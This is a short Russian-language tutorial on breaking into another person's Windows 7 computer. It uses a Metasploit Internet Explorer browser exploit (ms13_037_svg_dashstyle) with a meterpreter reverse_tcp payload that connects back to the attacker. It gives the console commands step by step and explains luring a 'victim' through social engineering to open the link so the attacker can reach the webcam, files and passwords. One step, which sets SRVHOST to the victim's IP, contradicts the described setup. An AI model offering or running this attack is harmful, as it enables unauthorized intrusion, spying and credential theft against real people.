Получаем доступ к чужому компьютеру через уязвимость в Windows 7

Суть в том, что мы скинем нашей жертва ссылку, которая расшатает уязвимость в Windows 7 и мы получим доступ к веб-камере, файлам и паролям. Единственная проблема в том, что она должна открыть её через Internet Explorer старой версии, которая стоит на семёрке.



Что нам понадобится:

1. Kali Linux
2. Metasploit
3. Знания СИ (социальной инженерии)

С Kali Linux и СИ вы уже знакомы и пора бы хоть кратко познакомить вас с Metasploit.



Metasploit - одна из популярнейших программ, имеющих самую большую базу эксплоитов, шеллкодов и кучу разнообразной документации, что не может не обрадовать.



Давайте начнём.

1. Запускаем Metasploit командой "msfconsole".
2. Выбираем уязвимость браузера. Пишем в командную строку "use exploit/windows/browser/ms13_037_svg_dashstyle".
3. Далее нужно узнать свой айпи. Пишем в командной строке "ifconfig".
4. "Set SRVHOST" и через пробел ip жертвы.
5. Командой "Show Targets" мы можем посмотреть доступные уязвимости.
6. Выбираем уязвимость IE 8 on Windows 7 SP1, для этого пишем set target 0 (или номер под которым находиться эта строчка).
7. Выбираем вирус который будет залит жертве. "set PAYLOAD windows/meterpreter/reverse_tcp".
8. "Set LHOST" и ваш ip, который вы узнали командой ifconfig.
9. Выполняем команду "exploit".
10. У вас отобразится ссылка, которую нужно будет отправить жертве. После открытия у неё ничего не отобразится, никакие файлы скачиваться не будут, а вы получите доступ к компьютеру.